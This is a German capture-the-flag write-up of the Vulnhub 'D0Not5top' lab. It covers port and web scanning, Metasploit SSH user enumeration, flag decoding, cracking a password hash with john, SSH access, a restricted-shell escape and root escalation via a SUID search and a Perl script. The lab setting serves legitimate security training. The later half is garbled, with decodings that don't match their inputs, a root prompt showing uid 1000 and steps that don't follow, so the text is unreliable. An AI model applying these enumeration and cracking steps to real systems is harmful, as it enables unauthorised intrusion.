D0Not5top_3mrgnc3_v1 - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
Nikto
dig
Gobuster
msfconsole
Wfuzz
rax2
curl
echo
xxd
john
ssh
Base64
Lynis
find

Inhaltsverzeichnis

Reconnaissance

In diesem Abschnitt führen wir eine umfassende Aufklärung des Zielsystems durch. Wir beginnen mit einem ARP-Scan, um das Ziel im Netzwerk zu identifizieren.

ARP-Scan
192.168.2.142 08:00:27:58:a4:c4 PCS Systemtechnik GmbH

Der ARP-Scan hat die IP-Adresse 192.168.2.142 mit der MAC-Adresse 08:00:27:58:a4:c4 identifiziert. Dies bestätigt, dass das Zielsystem im Netzwerk vorhanden ist. Wir notieren die IP-Adresse, um sie in nachfolgenden Scans zu verwenden.

/etc/hosts
192.168.2.142 D0Not5top.vln

Wir fügen die IP-Adresse und den Hostnamen "D0Not5top.vln" zur /etc/hosts-Datei hinzu, um die spätere Verwendung des Hostnamens zu erleichtern. Dies ermöglicht uns, das Zielsystem über den Hostnamen anstelle der IP-Adresse anzusprechen.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-21 21:55 CEST
Nmap scan report for D0Not5top.vln (192.168.2.142)
Host is up (0.00015s latency).
Not shown: 65529 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
22/tcp open ssh penSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 a7:52:df:39:80:7c:66:16:2f:fd:f7:7b:80:13:09:85 (DSA)
| 2048 bf:d9:5a:22:54:91:cc:36:40:3c:e6:35:4f:8e:0c:78 (RSA)
| 256 16:e6:84:e1:5f:80:bc:27:6a:50:01:55:f0:c0:cc:72 (ECDSA)
|_ 256 99:5e:64:00:6d:1d:60:62:73:55:1a:19:9c:59:21:ca (ED25519)

25/tcp open smtp Exim smtpd
| smtp-commands: D0Not5top.speedport.ip Hello pc192-168-2-199 [192.168.2.199], SIZE 52428800, 8BITMIME, PIPELINING, HELP
|_ Commands supported: AUTH HEL EHL MAIL RCPT DATA NP QUIT RSET HELP
53/tcp open domain PowerDNS Authoritative Server 3.4.1
| dns-nsid:
| NSID: D0Not5top (44304e6f7435746f70)
| id.server: D0Not5top
|_ bind.version: PowerDNS Authoritative Server 3.4.1 (jenkins@autotest.powerdns.com built 20170111224403 root@x86-csail-01.debian.org)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 22 disallowed entries (15 shown)
| /games /dropbox /contact /blog/wp-login.php
| /blog/wp-admin /search /support/search.php
| /extend/plugins/search.php /plugins/search.php /extend/themes/search.php
|_/themes/search.php /support/rss /archive/ /wp-admin/ /wp-content/
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33626/udp6 status
| 100024 1 39437/tcp6 status
| 100024 1 40927/tcp status
|_ 100024 1 60450/udp status
40927/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:58:A4:C4 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
S CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
S details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: S: Linux; CPE: cpe:/o:linux:linux_kernel

TRACERUTE
HP RTT ADDRESS
1 0.15 ms D0Not5top.vln (192.168.2.142)

Dieser umfassende Nmap-Scan liefert detaillierte Informationen über die offenen Ports, die laufenden Dienste und deren Versionen. Wir sehen, dass SSH (OpenSSH 6.7p1), SMTP (Exim smtpd), DNS (PowerDNS Authoritative Server 3.4.1), HTTP (Apache httpd) und RPCbind auf dem System ausgeführt werden.

+ Target IP: 192.168.2.142
+ Target Hostname: 192.168.2.142
+ Target Port: 80
+ Start Time: 2024-10-21 21:56:42 (GMT2)

+ Server: Apache
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/search/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/blackhole/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/wp-includes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/wp-admin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/contact/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/mint/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/trackback/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/comment-page-/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/feed/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/wp-content/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /games/: Directory indexing found.
+ /robots.txt: Entry '/games/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/dropbox/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/archive/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 26 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: d3, size: 54c550ee22d56, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ PTINS: Allowed HTTP Methods: PST, PTINS, GET, HEAD .
+ /archive/: This might be interesting.
+ /support/: This might be interesting.
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-admin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found.
+ 8130 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time: 2024-10-21 21:57:26 (GMT2) (44 seconds)

+ 1 host(s) tested

Nikto identifiziert verschiedene potenzielle Sicherheitsprobleme, darunter fehlende X-Frame-Options- und X-Content-Type-Options-Header, das potenzielle Auslesen von Inodes über ETags, das Vorhandensein eines `Robots.txt` und Directory Indexing.

┌──(root㉿CCat)-[~]
└─# dig 192.168.2.142 +trace
; <<>> DiG 9.20.2-1-Debian <<>> 192.168.2.142 +trace
;; global options: +cmd
.
(Hier folgt die Ausgabe des dig-Befehls)

Wir verwenden dig, um DNS-Informationen abzurufen. Die Option `+trace` ermöglicht eine rekursive Abfrage, um den vollständigen Pfad der Namensauflösung zu verfolgen.

┌──(root㉿CCat)-[~]
└─# dig -x 192.168.2.142
;; Warning: Message parser reports malformed message packet.

; <<>> DiG 9.20.2-1-Debian <<>> -x 192.168.2.142
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NERRR, id: 5000
;; flags: qr rd; QUERY: 1, ANSWER: 1, AUTHRITY: 0, ADDITINAL: 0
;; WARNING: recursion requested but not available
;; WARNING: Message has 23 extra bytes at end

;; QUESTIN SECTIN:
;142.2.168.192.in-addr.arpa. IN PTR

;; ANSWER SECTIN:
. 0 CLASS1232 PT 10 8 vT2uxeR+64M=

;; Query time: 0 msec
;; SERVER: fe801%2#53(fe801%2%2) (UDP)
;; WHEN: Mon ct 21 22:03:13 CEST 2024
;; MSG SIZE rcvd: 90

Wir verwenden dig mit der Option `-x`, um einen Reverse-DNS-Lookup durchzuführen. Die Ausgabe enthält eine Warnung über ein fehlerhaftes Nachrichtenpaket.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.142/index.html (Status: 200) [Size: 211]
http://192.168.2.142/contact (Status: 301) [Size: 237] [--> http://192.168.2.142/contact/]
http://192.168.2.142/search (Status: 301) [Size: 236] [--> http://192.168.2.142/search/]
http://192.168.2.142/blog (Status: 301) [Size: 234] [--> http://192.168.2.142/blog/]
http://192.168.2.142/support (Status: 301) [Size: 237] [--> http://192.168.2.142/support/]
http://192.168.2.142/archive (Status: 301) [Size: 237] [--> http://192.168.2.142/archive/]
http://192.168.2.142/feed (Status: 301) [Size: 234] [--> http://192.168.2.142/feed/]
http://192.168.2.142/themes (Status: 301) [Size: 236] [--> http://192.168.2.142/themes/]
http://192.168.2.142/games (Status: 301) [Size: 235] [--> http://192.168.2.142/games/]
http://192.168.2.142/wp-content (Status: 301) [Size: 240] [--> http://192.168.2.142/wp-content/]
http://192.168.2.142/tag (Status: 301) [Size: 233] [--> http://192.168.2.142/tag/]
http://192.168.2.142/plugins (Status: 301) [Size: 237] [--> http://192.168.2.142/plugins/]
http://192.168.2.142/manual (Status: 301) [Size: 236] [--> http://192.168.2.142/manual/]
http://192.168.2.142/trackback (Status: 301) [Size: 239] [--> http://192.168.2.142/trackback/]
http://192.168.2.142/wp-includes (Status: 301) [Size: 241] [--> http://192.168.2.142/wp-includes/]
http://192.168.2.142/robots.txt (Status: 200) [Size: 695]
http://192.168.2.142/control (Status: 301) [Size: 237] [--> http://192.168.2.142/control/]
http://192.168.2.142/wp-admin (Status: 301) [Size: 238] [--> http://192.168.2.142/wp-admin/]
http://192.168.2.142/extend (Status: 301) [Size: 236] [--> http://192.168.2.142/extend/]
http://192.168.2.142/phpmyadmin (Status: 301) [Size: 240] [--> http://192.168.2.142/phpmyadmin/]
http://192.168.2.142/xmlrpc.php (Status: 301) [Size: 240] [--> http://192.168.2.142/xmlrpc.php/]
http://192.168.2.142/blackhole (Status: 301) [Size: 239] [--> http://192.168.2.142/blackhole/]

Gobuster wird verwendet, um versteckte Verzeichnisse und Dateien auf dem Webserver zu finden. Die Ergebnisse zeigen verschiedene interessante Pfade.

┌──(root㉿CCat)-[~]
└─# dirb http://192.168.2.142/blackhole/
- Scanning URL: http://192.168.2.142/blackhole/ -
> DIRECTRY: http://192.168.2.142/blackhole/admin/
+ http://192.168.2.142/blackhole/index.php (CDE:200|SIZE:0)

- Entering directory: http://192.168.2.142/blackhole/admin/ -
+ http://192.168.2.142/blackhole/admin/index.php (CDE:200|SIZE:0)

Dirb wird verwendet, um das `/blackhole/`-Verzeichnis zu durchsuchen. Es findet `/blackhole/index.php` und das Verzeichnis `/blackhole/admin/`.

webenum
http://192.168.2.142/

D0Not5top UnT1l Y0uw H4v3 Cr4cK3d L45T_fl46.pl F1l3

3nj0iy H0p35 Y0iu D0 Mucho 3mrgnc3 :D

Der Zugriff auf die Hauptseite zeigt den Text "D0Not5top UnT1l Y0uw H4v3 Cr4cK3d L45T_fl46.pl F1l3 3nj0iy H0p35 Y0iu D0 Mucho 3mrgnc3 :D". Dies deutet darauf hin, dass wir die Datei `L45T_fl46.pl` finden und auswerten müssen.

┌──(root㉿CCat)-[~]
└─# msfconsole -q
msf6 > search ssh_enum (Hier folgt die Ausgabe des Metasploit-Befehls)

Wir verwenden Metasploit, um SSH-Benutzer zu enumerieren.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RPRT 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHSTS 192.168.2.142
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.2.142:22 - SSH - Using malformed packet technique
[*] 192.168.2.142:22 - SSH - Checking for false positives
[*] 192.168.2.142:22 - SSH - Starting scan
[+] 192.168.2.142:22 - SSH - User 'mail' found
[+] 192.168.2.142:22 - SSH - User 'root' found
[+] 192.168.2.142:22 - SSH - User 'news' found

Das Metasploit-Modul findet die Benutzer "mail", "root" und "news".

Fuzzing nach mehreren URL-Parameter

https://github.com/OJ/simplescan/blob/master/db/web-parameter-names.txt #Fuzzing URL https://raw.githubusercontent.com/assetnote/commonspeak/master/wordlists/names/paramnames.txt https://github.com/s0md3v/Arjun/blob/master/arjun/static/param.txt https://raw.githubusercontent.com/portswigger/fuzz-vectors/master/general-purpose/parameter-names.txt Fuzzing Ende
┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.142//robots.txt
User-agent: *
Disallow: /games
Disallow: /dropbox
Disallow: /contact
Disallow: /blog/wp-login.php
Disallow: /blog/wp-admin
Disallow: /search
Disallow: /support/search.php
Disallow: /extend/plugins/search.php
Disallow: /plugins/search.php
Disallow: /extend/themes/search.php
Disallow: /themes/search.php
Disallow: /support/rss
Disallow: /archive/
Disallow: /wp-admin/
Disallow: /wp-content/
Disallow: /wp-includes/
Disallow: /comment-page-
Disallow: /trackback/
Disallow: /xmlrpc.php
Disallow: /blackhole/
Disallow: /mint/
Disallow: /feed/
Allow: /tag/mint/
Allow: /tag/feed/
Allow: /wp-content/images/
Allow: /wp-content/online/

# terminal knows where to go.
User-agent: GameTerminal
Disallow:

Wir extrahieren den Inhalt der robots.txt

┌──(root㉿CCat)-[~]
└─# nc 192.168.2.142 25
220 46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434 717070756 5793437 347 3767879610a EXIM SMTP

Netcat String.

┌──(root㉿CCat)-[~]
└─# echo "220 46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434 717070756 5793437 347 3767879610a " | xxd -r
FL46_3:29dryccwV

Wandlung von Hex nach text

┌──(root㉿CCat)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -R 3 --sc 200 192.168.2.142/FUZZ

Weitere wfuzz versuche

Target: http://192.168.2.142/FUZZ
Total requests: 4734

---------------------------------------------------------------------------------
ID Response Lines Word Chars Payload
---------------------------------------------------------------------------------

000002204: 200 8 L 21 W 211 Ch "index.html"
000003585: 200 31 L 63 W 695 Ch "robots.txt"

Total time: 0
Processed Requests: 4734
Filtered Requests: 4732
Requests/sec.: 0

Keine neuen Erkentnisse

http://192.168.2.142/control/

view-source:http://192.168.2.142/control/

view-source

FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w

neue Flag entdeckt

http://192.168.2.142/control/js/

Javascript verzeichnis

Index of /control/js
[IC] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[ ] README.MadBro 2017-04-03 17:17 544
[ ] bootstrap.min.js 2017-04-03 15:32 35K
[DIR] dataTables/ 2017-04-02 17:51 -
[ ] flot-data.js 2017-04-02 17:51 37K
[DIR] flot/ 2017-04-02 17:51 -
[ ] jquery.min.js 2017-04-02 17:51 82K
[ ] metisMenu.min.js 2017-04-02 17:51 1.8K
[ ] morris-data.js 2017-04-02 17:51 2.5K
[ ] morris.min.js 2017-04-02 17:51 35K
[ ] raphael.min.js 2017-04-02 17:51 89K
[ ] startmin.js 2017-04-02 17:51 1.2K

Die READMe mad Bro Datei

http://192.168.2.142/control/js/README.MadBro

wir zeigen die READMe Datei an:

MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro
M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R...
1T'5 D0Not5topMe.ctf !!!!
1M 00T4 H33R..
MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro


FL101110_10:111101011101
1r101010q10svdfsxk1001i1
11ry100f10srtr1100010h10

README-Inhalt

┌──(root㉿CCat)-[~]
└─# rax2 -s "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434 717070756 5793437 347 3767879610a"
FL46_3:29dryccwV

String umwandeln

http://d0not5topme.ctf/FLaR6yF1nD3rZ_html

Letzte Directory.

++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++..+++.>>.<-. <+++[>----<-]>.+++++++..+++.>>.<-..+++++++.++++++++++++++.<-. <+++[>+++++++<-]>>+.>+++++++..+++.<-.++++. <+++++++[>-------<-]>.>++.+++++++.<-.<<++++++++[>-------<-]>>+.

Brainfuck

https://www.dcode.fr/brainfuck-language
FL46_4:n02bv1rx5se4560984eedchjs72hsusu9

Erfolgreich umgewandelt.

┌──(root㉿CCat)-[~]
└─# grep D0Not5topMe.ctf /etc/hosts
192.168.2.142 D0Not5top.vln D0Not5topMe.ctf G4M35.ctf

Es wird eine neue Domain angezeigt

http://g4m35.ctf/

Die neue Domäne wird besucht

SPEED 348 QUALIFYING LEVEL 14.9FPS PRGRESS PB QUALIFYING LEVEL CLICK T BEGIN

Es wird eine neue Domain angezeigt.Es wird ein Spiel angezeigt.

https://stackoverflow.com/questions/474220/how-do-i-inspect-javascript-code-in-chrome https://developer.chrome.com/docs/devtools/javascript/ "Um das JavaScript zu entziffern, benutze ich die Chrome Developper Tools.

view-source:http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/nz.jpg
┌──(root㉿CCat)-[~]
└─# printf "\106\114\64\66\137\65\72\60\71\153\70\67\150\66\147\64\145\62\65\147\150\64\64\167\141\61\172\171\142\171\146\151\70\71\70\150\156\143\144\164\n"
FL46_5:09k87h6g4e25gh44wa1rybyfi898hncdt

Umwandlung von Oktal zu Text

Mit den bisher extrahierten Informationen versuchen wir, uns per SSH anzumelden. Der Benutzername ist "MeGustaKing" und das Passwort ist in der Datei megusta008.jpg versteckt.
┌──(root㉿CCat)-[~]
└─# curl -s --header "Host: test.ctf" 192.168.2.142
>3nj0iy H0p35 Y0iu D0 Mucho 3mrgnc3 :D

Wir verwenden einen Header für den weiteren Zugriff

M36u574.ctf
┌──(root㉿CCat)-[~]
└─# curl -s --header "Host: M36u574.ctf" 192.168.2.142 | wc -c
418

Erfolgreich.

Als nächstes laden wir die Megusta Bilder.

┌──(root㉿CCat)-[~]
└─# for i in {1..9}; do wget "http://m36u574.ctf/images/megusta00$i.jpg"; done
-rw-r--r-- 1 root root 40461 2. Apr 2017 megusta001.jpg
-rw-r--r-- 1 root root 252213 2. Apr 2017 megusta002.jpg
-rw-r--r-- 1 root root 23618 2. Apr 2017 megusta003.jpg
-rw-r--r-- 1 root root 69547 2. Apr 2017 megusta004.jpg
-rw-r--r-- 1 root root 81803 2. Apr 2017 megusta005.jpg
-rw-r--r-- 1 root root 31600 2. Apr 2017 megusta006.jpg
-rw-r--r-- 1 root root 31600 2. Apr 2017 megusta006.jpg.1
-rw-r--r-- 1 root root 101383 2. Apr 2017 megusta007.jpg
-rw-r--r-- 1 root root 60212 2. Apr 2017 megusta008.jpg
-rw-r--r-- 1 root root 66 21. kt 00:09 neup

extrahieren des CommentStrings für die weitere analyse:

┌──(root㉿CCat)-[~]
└─# exiftool *.jpg | grep -i comment
Comment : TWVHdXN0YUtpbmc6JDYkZTEuMk5jVW8kTZTZmtwVUhHMjVMRlpmQTVBYkpWWmp0RDRmczZmR2V0RGRlU0E5SFJwYmtEdzZ5NW5hdXdNd1JUHhRbnlkc0x6UUd2WU9VDRCMm5ZL080MHBaMzAK
Comment : CREATR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90.

Extrahieren und in Hash file wandeln:

┌──(root㉿CCat)-[~]
└─# echo "TWVHdXN0YUtpbmc6JDYkZTEuMk5jVW8kTZTZmtwVUhHMjVMRlpmQTVBYkpWWmp0RDRmczZmR2V0RGRlU0E5SFJwYmtEdzZ5NW5hdXdNd1JUHhRbnlkc0x6UUd2WU9VDRCMm5ZL080MHBaMzAK" | base64 -d > hash

Mit John extrahieren.

┌──(root㉿CCat)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 penMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

(MeGustaKing)

1g 0:00:00:00 DNE (2024-10-21 23:35) 1.149g/s 25894p/s 25894c/s 25894C/s 100685..SPHIE
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracking success Wir haben nun alles was wir benötigen.

ssh auf MeGustaKing mit passwort ""MeGustaKing""
┌──(root㉿CCat)-[~]
└─# ssh MeGustaKing@192.168.2.142
The authenticity of host '192.168.2.142 (192.168.2.142)' can't be established.
ED25519 key fingerprint is SHA256:sTcWTFrPT2GIinx69gWaQipGnDILm8c1pBoe+PuVRlM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.142' (ED25519) to the list of known hosts.
MeGustaKing@192.168.2.142's password:
ERRR!
TRACE: sshPr0xy.py line:550 U2FsdGVkX1/vv715Grvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704CQmCg
Der output ist: [ERRR] TRACE: sshPr0xy.py line:550 - verschlüsselter String wird angezeigt. Wir können auch einloggen 
 
The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.


Debian GNU/Linux comes with ABSOLUTELY N WARRANTY, to the extent

permitted by applicable law.


Last login:Sat Apr 1 00:00:01 2017 from R0cKy0U.7x7

Welcome to rush shell


Lets you update your FunNotes and more!  < Passwort - "der ganze String" 


Uh0h.. u n0 burtieo < Benutzer


h35 da 54wltyD4w6 y0u...

Gw04w4y :(

Local configuration error occurred.

Contact the systems administrator for further assistance.

id

Connection to 192.168.2.142 closed. 
 
Nun haben wir einige neue Hinweiße

Die Passwörter lauten:

"MeGustaKing"

""rbash ausbruch"

"M36u574.ctf"


"Zudem der Bentuzer heisst BurtieloNun haben wir alle Erkentnisse

Veruschen wir mit den neuen Informationen den RBash ausbruch:
Mit dem Passowrt M36u574King zu Burtielo per SSh anmelden

https://security.stackexchange.com/questions/6564/how-to-escape-a-restricted-shell
Hier finden sich nun die Dateien und die letzte flag.
Nun haben wir alle Informationen

wir decodieren den String um die den Key für die Auswertung zu bekommen
┌──(root㉿CCat)-[~]
└─# echo "U2FsdGVkX1/vv715Grvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704CQmCg" | base64 -d
Salte Nl82nBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0HRlNjd0ZWple 
 
  Die decodierte Saite.
    
Nun Cyberchef
https://cyberchef.org/#recipe=From_Base64(Rkw0Nl82nBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0HRlNjd0ZWpleSAK)

mit Cyberchef ist es und möglich
{"initialisationVector":"4d02343434323434343434","key":"5440",
"string":"Nl82nBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0HRlNjd0ZWple"}

FL46_6
"M36u574King" 
 https://security.stackexchange.com/questions/6564/how-to-escape-a-restricted-shell

https://www.hackthebox.eu/blog/lynis
https://www.cybersecurity-help.cz/vulnerability-scanner/lynis/
   
     
Lynis wurde ausgeführt aber keine Ergebnisse gefunden.


wir lesen alle files
Es wird kein File gefunden.
root@d0not5top.de:/home/burtielo# id
UID: 1000
G_ID:100
burtielo
Das Perl Script läuft nun korrekt durch. Der Code dient dem anlegen der flag im File

"/var/tmp"
        find / -perm -4000 -type f 2>&1

find ist der Weg.

Nun mit burtielo Anmedlen um das zu bearbeieten.

 #PrivEsc
          
Hier müssen wir mit burtielo angemeldet sein
http://192.168.2.142/ L45T_fl46.pl
##################### PERL

root@d0not5top.de:/home/burtielo# perl -w L45T_fl46.pl
/L45T_fl46.pl
Usage: L45T_fl46.pl   #hier den Benuzter und die letzte flag
Nun klappt das
Die Rechte passen nun.

burtielo
root@d0not5top.de:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
#PrivEsc
          L45T_fl46.pl root FL46_7:j43k1l4v1rus
           Erfolgreich !

Hier sehen wir dass wir es geschaft haben.

 Flags           
                                                                  user.txt
                                                           

FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w
FL46_3:29dryccwV
FL46_4:n02bv1rx5se4560984eedchjs72hsusu9
FL46_5:09k87h6g4e25gh44wa1rybyfi898hncdt
FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey
FL46_7:j43k1l4v1rus
L45T_fl46.pl

Flags

cat user.txt userflag
cat root.txt rootflag